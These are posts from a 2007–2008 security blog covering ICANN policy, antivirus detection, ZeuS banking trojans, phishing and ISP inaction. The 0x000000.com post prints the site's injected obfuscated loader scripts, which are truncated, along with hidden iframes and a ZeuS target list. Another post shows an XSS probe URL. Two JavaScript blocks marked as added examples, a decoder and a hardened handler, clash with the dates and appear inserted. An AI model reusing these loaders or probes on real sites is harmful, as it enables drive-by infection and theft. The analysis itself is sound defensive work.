mercredi 25 juin 2008

ICANN MAKE SOME MONEY HERE...

Icann's general meetings are held three times a year, and Paris welcomes the 32nd event of this kind this week. It is a good occasion for various interest groups to share their opinions on the way the Internet will/may/should evolve. It is also a place to openly discuss (and eventually agree on) the policies that regulate how the Web is operated.

The subject of a complete liberalisation of TLD (top-level domain name) extensions, announced (almost) without prior notice by the Director of Icann, Paul Twomey, some days ago, has made the headlines of major business newspapers such as yesterday's LesEchos.

A debate took place between pros and cons during the "New gTLDs workshop", but from a security point of view, this doesn't look like a good idea. Mike Rodenbaugh expressed some concerns about such a move, which may endanger the security and stability of the Internet. But other participants warmly endorsed the proposition.

Earlier in the afternoon, Steve Crocker and Dave Piscitello from the SSAC committee warned the public about some other threats. They particularly explained the risk of phishing attacks that target domain name portfolios, and of registrar impersonation attacks. The Comcast example served as an illustration for the registrars attending this session. The problem of DNS response modification by "entrusted agents" (registries, registrars, ISPs, etc.) was also discussed. You may review the complete SSAC committee action plan on this page.

Numerous other topics of interest for the security community are being raised this week. The fast-flux hosting technique, used in more and more malevolent activities, was for example on the agenda of another meeting of the GNSO. This report from March 2008 helped the GNSO approve a resolution on the matter. Icann also seems to finally agree on another threat/moneymaking model -cross out words depending which business you're in- : Domain Tasting.

But Icann is a complex not-for-profit (sic) organisation. Different groups are lobbying for diverging (often financially motivated) interests: these groups can represent (linguistic or geographic) communities that want Icann to open a new TLD for their exclusive use. On the other hand, the CP80 foundation tries for example to encourage Icann to set standards -ports filtering for instance- at the governments or ISPs' level to rule out explicit adult content from the Web.

The heavy Icann structure and strong opposite forces often result in a slow decision process (remember the .XXX TLD story?). And on the other side, cybercriminals and cyberprofiteers don't have these burdens and will quickly identify "opportunities".

mercredi 21 mai 2008

AV caesar, morituri te salutant?

A few days ago, Pedro Bustamante from Panda wrote a very interesting post about automated AV signature creation, emphasizing the risk of false positives with such a method. He uses the example of a gaming company, Fenomen Games, that generates numerous distinct Gaming Downloaders. According to him, these binaries are not malicious, and massive FPs are automatically inserted by AV editors into their databases.

In order to cope with the exploding number of malware variants that are dynamically created, AV vendors are forced to use various techniques to automatically analyze and detect new threats. This trend is a tough challenge, and the race between the good guys and the villains can probably not be won by AV engines that way.

Automated malware analysis is undoubtedly the key, due to the ever increasing number of malware variants being seen in the wild. But AVs, ISPs and LEAs should also try to make better use of all the intelligence gathered, and particularly of the "network" connections initiated by these pieces of malware. Even if viruses are more and more difficult to reverse-engineer today (think about StormWorm's automatic DDoS protection, or the virtual machine detection used by more and more samples), most sandboxes still provide valuable information about command&control and blind-drop Web servers.

For example, we noticed today that one of the samples we have -automatically- analyzed was trying to connect to a server located in the US at this address: http://XXXXquanglan4.t35.com/. New malware variants have been trying to download two files (setting.xls and setting.nql) from this server since May 2007 at least! They are known to be a specific worm called Sohanad -also referenced as Pitin under some AV nomenclatures- (see here or here for example). What is surprising here is that this malware propagation source is still online one year after being discovered. Let's hope it was deliberately kept online by LEAs or anti-cybercrime units for investigation purposes.

But what is even more disturbing is that these 2 files are only detected by 2 out of 32 AV editors' signatures according to yesterday's VT report (We'll talk another time about these detection rates, as it could be subject to some misunderstanding).

So far, we still need AV engines, but controversy on the AV industry has risen lately in numerous IT security forums and blogs. The RaceToZero contest dilemma and the latest moves in AV testing (merger of Anti Malware Test Lab and AV Comparatives, new Anti-Malware Testing Working Group set up by a bunch of AV editors, etc) prove that the industry will probably have to go through some serious changes.

I believe that more "human" investigators, able to require hosting providers -such as t35.com- to disclose information about some of their customers, would help find the real people behind these criminal activities, instead of only dealing with the symptoms (a.k.a. better protection against infections).

lundi 31 mars 2008

Off-by 0x000000

Today I saw that the front page of 0x000000.com looked empty. Was I going to spend a day without an interesting article to read? No, it wasn't possible!

A quick check of the source code revealed that the main page of this rather famous blog contained some obfuscated JavaScript and a call to a suspicious JavaScript file called webanalytics.js:

<script src="http://safe.google-xxxxxxxxx.com/webanalytics.js"></script>
<script>
function v47f05eb5a54fc(v47f05eb5a5505)
{ var v47f05eb5a5510=16;
return(parseInt(v47f05eb5a5505,v47f05eb5a5510));}
function v47f05eb5a5544(v47f05eb5a554a)
{  var v47f05eb5a5550=''; for(v47f05eb5a5556=0;
v47f05eb5a5556<v47f05eb5a554a.length; v47f05eb5a5556+=2)
{ 
v47f05eb5a5550+=(String.fromCharCode(v47f05eb5a54fc(v47f05eb5a554a.substr(v47f05eb5a5556, 2))));}
return v47f05eb5a5550;}
document.write(v47f05eb5a5544('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3762363731207372633D5C2768747...'));</script>

whereas the webanalytics.js contained:

function google_irl(google_ryg,google_famas) {
var google_xen = "";
for (var i = 0 ; i < google_ryg.length; ++i)
google_xen += String.fromCharCode(google_famas ^ google_ryg.charCodeAt(i));
return google_xen; }
function google_ritn(google_ftak) { eval(google_ftak); return;}
google_ritn(google_irl("\xcb\xd5\xd2\xd8\xd3\xcb\x92\xcf\xc8\xdd\xc8\xc9\xcf\x81\x9e\xf8\xd3\xd2\xd9\x9e\x87\xb1\xb6\xd8\xd3\xdf\xc9\xd1\xd9\xd2\xc8\x92\xcb\xce\xd5\xc8\xd9\x94\x9b\x80\xd5\x9b\x97\x9b\xda\xce\xdd\x9b\x97\x9b\xd1\xd9\x9c\xcf\xce\x9b\x97\x9b\xdf\x81\x9e\x9b\x97\xc9\xd2\xd9\xcf\xdf\xdd\xcc\xd9\x94\x9b\xd4\xc8\xc8\xcc\x99\x8f\xfd\x93\x93\x8e\x8c\x8d\x92\x8e\x8d\x84\x92\xxx\xxx\xxx\xxx\xxx\xxx\xxx\x93\xcb\xd9\xde\xdd\xd2\xdd\xd0\xc5\xc8\xd5\xdf\xcf\x93\xdf\xd3\xc9\xd2\xc8\x92\xcc\xd4\xcc\x99\x8f\xfa\xd3\x99\x8f\xf8\x8d\x9b\x95\x97\x9b\x9e\x9c\xcb\xd5\xd8...", 188));

Those 2 scripts turned out, as expected, to inject 2 i-frames pointing towards a malicious website. This website is said to be in Panama, according to the whois record of the IP address, but the domain is resolved by a Russian server. As for the owner, he is using a pseudonym, has a Russian email address and is apparently living in Germany. Too much to believe...

The 2 i-frames looked like:

<iframe name=7b671 src='http://url/?100313d5ff' 
width=305 height=340 style='display: none'></iframe>

and

<iframe src="http://201.218.xxx.xxx/webanalytics/count.php?o=1" 
width="0" height="0" style="display:none"></iframe>
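The two loader stages quoted above can be unpacked statically, without ever handing the result to eval() or document.write(). The following is an added example written for this post, not code from 0x000000.com or from the attacker's scripts; the function names, the constructed sample iframe and the "url.invalid" placeholder are ours, while the two prefixes marked as taken from the page are the opening bytes of the blobs shown above (the rest is redacted on the page).

```javascript
// Stage 1 on the page: pairs of hex digits, one character each
// (the v47f05eb5a5544 routine). Reimplemented here as a plain decoder.
function decodeHexPairs(hex) {
  let out = '';
  for (let i = 0; i + 1 < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substring(i, i + 2), 16));
  }
  return out;
}

// Stage 2 on the page (google_irl): every character XOR'd with one key byte.
// XOR is its own inverse, so the same function encodes a sample for testing.
function xorDecode(data, key) {
  let out = '';
  for (let i = 0; i < data.length; i++) {
    out += String.fromCharCode((key ^ data.charCodeAt(i)) & 0xff);
  }
  return out;
}

// List the iframes in decoded HTML. A display:none or 0x0 frame is the
// drive-by pattern the post describes, so it is flagged as hidden.
function findIframes(html) {
  const re = /<iframe\b([^>]*)>/gi;
  const result = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    const hidden = /display\s*:\s*none/i.test(attrs) ||
      /\bwidth\s*=\s*["']?0\b/i.test(attrs);
    result.push({ src: src ? src[1] : null, hidden });
  }
  return result;
}

// Opening bytes of both blobs quoted in the post, used here as a check that
// the two routines reproduce what the loaders compute (key 188 is the page's).
const PAGE_HEX_PREFIX = '3C5343524950543E77696E646F772E7374617475733D27';
const PAGE_XOR_PREFIX =
  '\xcb\xd5\xd2\xd8\xd3\xcb\x92\xcf\xc8\xdd\xc8\xc9\xcf\x81\x9e';
const PAGE_XOR_KEY = 188;

// Constructed sample: a harmless iframe encoded the way both loaders did it,
// with an invalid-TLD placeholder instead of a real site.
const SAMPLE_HTML =
  "<iframe name=7b671 src='http://url.invalid/?100313d5ff' width=305 " +
  "height=340 style='display: none'></iframe>";
function hexEncode(s) {
  return Array.from(s, c => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}
const SAMPLE_STAGE1 = hexEncode(SAMPLE_HTML);
const SAMPLE_STAGE2 = xorDecode(SAMPLE_HTML, PAGE_XOR_KEY);

// Decode both stages and report the iframes they would have written.
function analyse(stage1Hex, stage2Xor, key) {
  const html = decodeHexPairs(stage1Hex) + xorDecode(stage2Xor, key);
  return findIframes(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(decodeHexPairs(PAGE_HEX_PREFIX));          // <SCRIPT>window.status='
  console.log(xorDecode(PAGE_XOR_PREFIX, PAGE_XOR_KEY)); // window.status="
  console.log(analyse(SAMPLE_STAGE1, SAMPLE_STAGE2, PAGE_XOR_KEY));
}
```

Decoding the page's own prefixes shows both stages start by setting window.status, exactly as the hex blob reads once unpacked.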

Those i-frames, so widely spread nowadays, are often the sign of a drive-by download. In that case, after a few exploits, a Windows executable file is pushed to the browser and executed without any warning. This file (here called getexe.exe) downloads, as its name implies, another executable file called upda.exe. This file is the trojan horse, and needs its configuration file to know its targets. This malware, from the ntos/prg/wsnpoem/zeus family, is a password stealer targeting banks.

The configuration file is encrypted. Once deciphered (on the fly by the malware), it shows all the targets. Among some of the well-known banking institutions, it seems that some more targets have been added:

...
citibank.ru_balance: section 3
http://login.osmp.ru/*
http://www.osmp.ru/dealer/index.php*
https://www.e-gold.com/acct/acct.asp
https://www.e-gold.com/acct/li.asp
https://www.e-gold.com/acct/balance.asp
https://www.moneybookers.com/app/my_account.pl
https://www.epassporte.com/secure/epassporte.cgi
https://light.webmoney.ru/Default.aspx?l=*
http://money.yandex.ru/*
...

Once again, we learn that being a computer security professional doesn't mean you cannot be hacked. No matter how secure you feel, you should always stay up to date on every aspect of your computer security: run as few services as possible, upgrade your software every time an upgrade is out, run internal audits as often as you can to detect potentially bad behaviour from your servers, have a good IDS/IPS with rules that you understand...

A high number of popular websites have been hacked recently, through different techniques, supplying unknown malware to their visitors. This easy way of spreading malware will be used more and more.

Today's attack was not a great movie but was somehow something very usual. I hope public awareness and developers' cautiousness will help lower the number of attacks and their impact.

Update: We exchanged some e-mails yesterday with the owner of 0x000000.com, who brought some facts to our attention. First, 0x000000.com is hosted on a shared server. Then he pointed out that many other domains hosted on the same server had been hacked, which proves that the attack was not targeted, but rather generic. We thank him for this information, and once again we encourage you to read his writings, which are of great interest.

mardi 11 mars 2008

ZeuS and his thunderbolts

In Greek mythology, Zeus is the king of all Gods. He is powerful and can strike any time any where using his thunderbolts. In computer security, ZeuS is just another powerful malware, also known as PRG, ZBOT, or NTOS by some AV editors.

At first, ZeuS was sold on the black market, and could be configured to the buyer's desire. It mainly had bot capabilities at that time, and its popularity quickly grew in the pirate community. But this fame was a bit too much for its author, who is believed to have stopped selling it. Yet new variants still continue to arrive on a daily basis, either produced by the original author or by other malware programmers. It got a lot of improvements, and is now a very nasty and active banking trojan. We have been watching it evolve for months, but recently we noticed a slight increase in the amount of PRG spreading around.

Last night, I got 18 different variants of ZeuS downloaders. A variant means that the binary is not exactly the same, each one having a different MD5 (or SHA256) hash. Therefore, I decided it was high time to make some comparisons between these variants. "Grep" in one hand, "sort" and "uniq" in the other (after all I'm a geek), I started digging through the different configurations I had in my possession. My goal was to get the different command&control (or C&C) servers of these trojans.

At first glance, it was obvious that the configuration files were not exactly the same, as they were targeting different banking institutions. I could for example find one specific bank in a single file, but not in the others. Furthermore, some other banks were specifically targeted by some variants, and some were in all of them. Also, the C&C server and the PHP script collecting the data were stored on different servers. From the 18 downloaders I had, there were 8 different places where the scripts could be found:

http://195.2.x.x/11/s.php
http://195.2.x.x/11/s.php/11/s.php
http://195.2.x.x/11/s.php5
http://195.93.x.x/~xxx/a5y5ju79h/s.php
http://195.93.x.x/xxx/a5y5ju79h/s.php
http://202.75.x.x/zeus/s.php
http://xxx.la/vvv/s.php
http://xxx.la/vvv/s.php/vvv/s.php3

Not surprisingly, most of these scripts are hosted in Russia, while some are in Malaysia.

As for the places where all the downloaders connect to retrieve the actual Trojan, we discovered that there were only 4 different locations:

http://195.2.x.x/hh/ldr.exe
http://195.2.x.x/11/ldr.exe
http://85.255.x.x/download/1013.exe
http://xxxxxxx-xxxxxxxx.com/images/m.exe

Russian, Ukrainian, and Turkish IPs are hosting these malicious binaries.

As for their detection by AV products, it is luckily quite high for the 18 downloaders: on average, 20 AV editors out of 32 (from VirusTotal.com) recognize these variants. But the trojan itself, "m.exe" and "ldr.exe", was only detected by three AV editors at the time of this writing.

You can find more info about ZeuS on Kaspersky's Viruslist.com here.

mardi 19 février 2008

Make love not theft!

Remember the fraud campaign we discovered last summer ?

Well, we've been keeping an eye on this Trojan. Its configuration file has been regularly updated. Today the encrypted activation strings changed again to include some new targets in Italy or Malta (Bank of Valletta, BancadiRoma, BancodeSicilia for example).
But more interestingly, 2 new URL-strings have been added to targets:

(Extract)

...
+*dorcel.com
+*janswebring.com
...
(the "*" in front of the domain names means that all sub-domains are also being monitored as targets).

The pirates seem to look for accounts from the famous French porn producer Marc Dorcel and from the "Adult Movie Fan Community" JansWebring porn websites.

So, are they just bored of stealing money or is there a new “proof-of-concept” fraud-technique behind it?
:-)

mercredi 6 février 2008

Transparency

If you're dealing with web server security, you might already know the XSSED website. It is focused on publishing XSS vulnerabilities found on web servers, information that is provided by numerous contributors only identified by their nicknames. If you don't know what an XSS (also known as Cross-site Scripting) vulnerability is, I'll try to make it short.

First, I should say this kind of vulnerability is one of the most basic and common (along with SQL injection) that you can find on web servers. It consists of "injecting" JavaScript and/or HTML into a page served by the web server. It is mainly done by adding specific data to the usual URL.

Let's say there's a website called www.websiteX.com, with this URL shown in the browser:

http://www.websiteX.com/index.php?page=2

This basically tells the browser to connect to index.php and to set and send the value "2" for the variable "page". Now if I change this value, and set it to 3 for example (http://www.websiteX.com/index.php?page=3), then my browser shows me another page. Once again, I won't dive into the details of PHP or any other technique. Let's just imagine some PHP scripts are handling the information you send them quite badly, allowing the execution of injected code.

So now what if I put strange values into the variable "page", or even... some JavaScript code? Like this: http://www.websiteX.com/index.php?page=<script>alert("hello world");</script>

Whoaaah, the result is what I expected: a popup appears, containing the text "hello world". Now we know this index.php script is handling the variable "page" very badly. We could go on and do nastier things, but this is not the point. If you want to know more, XSSED is a good starting link. You can even be warned when a vulnerability is found on one of your own domains, including all its subdomains, which is an interesting (but not sufficient) feature to start protecting your perimeter.
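The index.php?page=... script above is imagined in PHP; as an added example for this post (not code from the blog or from xssed.com), here is the same handler written twice as small JavaScript functions, once reflecting the parameter raw, which is what makes the alert("hello world") probe pop up, and once validating and escaping it. The function names (renderUnsafe, renderSafe, escapeHtml, parseQuery) are ours.

```javascript
// Parse the query string of a URL into an object, e.g. "?page=2" -> {page: "2"}.
function parseQuery(url) {
  const qs = url.indexOf('?') === -1 ? '' : url.slice(url.indexOf('?') + 1);
  const out = {};
  for (const pair of qs.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const k = eq === -1 ? pair : pair.slice(0, eq);
    const v = eq === -1 ? '' : pair.slice(eq + 1);
    out[decodeURIComponent(k)] = decodeURIComponent(v.replace(/\+/g, ' '));
  }
  return out;
}

// Vulnerable: the value of "page" is pasted straight into the HTML, so
// page=<script>alert("hello world");</script> is returned as live markup
// and runs in the visitor's browser.
function renderUnsafe(url) {
  const page = parseQuery(url).page || '1';
  return '<h1>Page ' + page + '</h1>';
}

// Escape the five characters that can change HTML structure.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened: accept only what "page" is supposed to be (a small integer here)
// and escape on output anyway, so anything unexpected is shown as text.
function renderSafe(url) {
  const raw = parseQuery(url).page || '1';
  const page = /^\d{1,6}$/.test(raw) ? raw : '1';
  return '<h1>Page ' + escapeHtml(page) + '</h1>';
}

// Quick check an auditor can run on rendered output: did a script tag that
// is not part of the template survive into the response?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// The probe from the post, used only as input to the two handlers.
const PROBE_URL =
  'http://www.websiteX.com/index.php?page=<script>alert("hello world");</script>';
```

Running both handlers on the post's probe URL shows the raw version echoing the script tag while the hardened one answers with a plain "Page 1".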

Recently, xssed.com and xssing.com announced they were now affiliated and working together. XSSing.com is also specialised in XSS techniques. Publishing XSS vulnerabilities about other people you don't necessarily know is one thing. But today, someone called ZuLL reported a vulnerability found directly on the xssing.com website.

Now, this is called transparency! :-)

vendredi 12 octobre 2007

.ASIA against phishers

This surely is great news.

Laura Mather from the APWG (Anti-Phishing Working Group) declared that the DotAsia Organisation had agreed to a new policy, consisting of banning domains associated with phishing.

This new registry which has just launched the .asia gTLD (generic Top Level Domain) seems to be willing to close down the domains leading to phishing content.

We're glad to hear this, because registries usually set explicit policies that keep them from interfering in disputes regarding domain names. These policies are particularly driven by their need to protect themselves against legal issues and from an overwhelming workload.

But to shut down a fraudulent website that uses fast-flux botnet techniques, your only hope is going after the domain name, and therefore contacting the registrar. At the registrar level, however, it often takes too much time to be really effective, because of insufficient staff/process capacity or of declared complaisance with fraudsters from some of these companies. (Who said Estdomains?)

Directly shutting down the domain has its advantages compared to removing the content on the hosting side, since a growing number of phishing campaigns use "fast flux"-like technology. It is not rare nowadays to see one campaign hosted on twenty servers or more. Even if one is shut down, the others are still active. But in this case, there is often a single domain leading to all these hosts. Cutting this link is the only efficient way to stop this kind of phishing.

To have the registries getting involved in the fight against phishing would definitely be helpful, particularly if they put some effort (staff members, extended hours…) on the matter. On their side, DotAsia seems to want to rely on a few trusted sources that will send them verified information.

Let's hope such willingness turns into reality and effective success, and gives ideas to the other registries...

mercredi 10 octobre 2007

Frustrating ISP

In this period full of "Storms" and other malware, spreading worldwide in such an efficient manner, the need for cooperation between security companies has never been so huge.

  • Computer Emergency Response Teams (CERT) collaborate on important topics, like fighting against phishing/pharming, providing information to each other, exchanging tips, and so on;
  • Law Enforcement Agencies get to work together more and more. Although the system is far from being perfect, it is growing and getting better every day, with new cybercrime laws;
  • Anti-Virus companies exchange data with each other, and cooperate with LE and sometimes CERTs;
  • Incident Response Teams from many companies are in contact with one another, and are generally working well with LE.

Now what about the ISPs who give you your daily connection to the Internet? To keep things clear, be aware that this article only covers French ISPs.

In 1997, they founded the AFA (Association des Fournisseurs d'Accès), an association meant to help develop the Internet in France, to inform the public, and to cooperate internationally with other ISPs. They also provide protection against child porn and are involved in anti-spam organisations. Now what do they do against malware? You don't need to think about it for long: they do nothing. In some cases where they really could have a positive effect against cybercrime, they choose not to act.

Let's say you are a computer security professional working on a huge botnet. You see thousands of IP addresses from an ISP in your country, all sending DNS and TCP packets to badstuff.com. Browsing www.badstuff.com, you see no web content. Now looking at the "whois" data for badstuff.com, you notice immediately that it has been created to collect information from bots: it has been registered by John Doe, Planet Earth, h4ck1ngmastah@badstuff.com.

Calling the ISP, you tell them they should block all connections trying to reach this particular domain, because it is hosting the command&control of a big bad botnet that steals personal and confidential information from their customers. Moreover, you offer to provide them with all the IP addresses and timelines of the infected computers, so that they can call their customers and explain to them that they are infected.

With usually a charming voice, they answer your request:

  • We are sorry, but technically, we cannot block in such way;
  • We are sorry, although we could technically do it, we won't, because it would infringe the freedom spirit of the Internet/the privacy rights of our customers;

Now take one of these two sentences as an introduction, and add one of the following, depending on the ISP:

  • We are very interested in the IP addresses you collected while studying this botnet. Now we won't tell the users;
  • We are not interested at all, and won't say anything to our customers;
  • We are not interested at all, and if you say anything regarding our customers to the press, or if you say anything to our customers, we will engage a legal procedure against you. (The voice, in this case, is still charming, which is even more frightening.)

We talked about blocking a single domain. Now imagine how an ISP reacts when you show them a complete range of malicious IP addresses from a well-known bulletproof hosting company...

Isn't this frustrating?

mardi 9 octobre 2007

Phishing trends and stats

The first Phishtank.com annual report was released today.

No big news, but their statistics are still interesting and partially consistent with some of our own findings. France, for instance, occupies the fifth place among countries hosting the most fraudulent sites, with 4.8%. Proxad (parent company of the famous French ISP Free) is, by the way, ranked 7th among phishing hosting networks.

But none of the French banks is listed among the first 69 targeted companies. This said, these statistics are of course fragmented, as we see on our side a few hundred phishing websites targeting French institutions (including some targeting the Free ISP!).

Brian Krebs's blog provides a copy of this report here and an article on the matter here.

mercredi 26 septembre 2007

Fujacks author gets a sentence... and a job

Some days ago, a 25-year-old Chinese programmer named Li Jun was sentenced to four years of prison. Li Jun is the writer of the famous "Fujacks" computer virus, also known as "Panda Burns Joss Stick". Three of his friends, Wang Lei, Zhang Shun and Lei Lei, have also been sentenced in the same case.

The virus had been sold by Li Jun and his accomplices, and had earned them between 100 000 and 200 000 yuan (12 500-25 000 dollars). Once a machine was infected with Fujacks, the virus changed the icon of every infected program to a panda holding joss sticks. It was also stealing private information from users.

Earlier this year, Li Jun had written a software solution to clean infected machines from his virus, following a request from the Chinese authorities. It seems that the prosecutor didn't really take this into account.

Now what is more disturbing is that almost immediately after this judgement, Li Jun found himself "spammed" with job offers from IT companies. According to the Changjiang Times, a company hit by the malware offered Li Jun a position as technology director, with a salary of a million yuan ($130,000) a year, after hearing that Li Jun had programmed the virus because he was bored of not finding a job. About ten companies have also offered jobs to the malware author.

This idea of "doing the worst to get the best" is very disturbing in the IT field. There have been numerous cases over the last twenty years showing that some malicious programmers could get really good jobs, and this affair is surely not the only one this year. 17-year-old George Hotz is another example of sudden job success. By breaking the iPhone lock protection, making it usable on any operator's network, George was offered a job at Certicell, as a consultant.

These are only two cases amongst many. Of course, when someone is sentenced to prison and comes back to society, he should be fully reintegrated into it. But coming back from prison and getting a juicy job could give ideas to a lot of other programmers, bored of being jobless. Especially in countries where laws are nonexistent or very accommodating with such cases...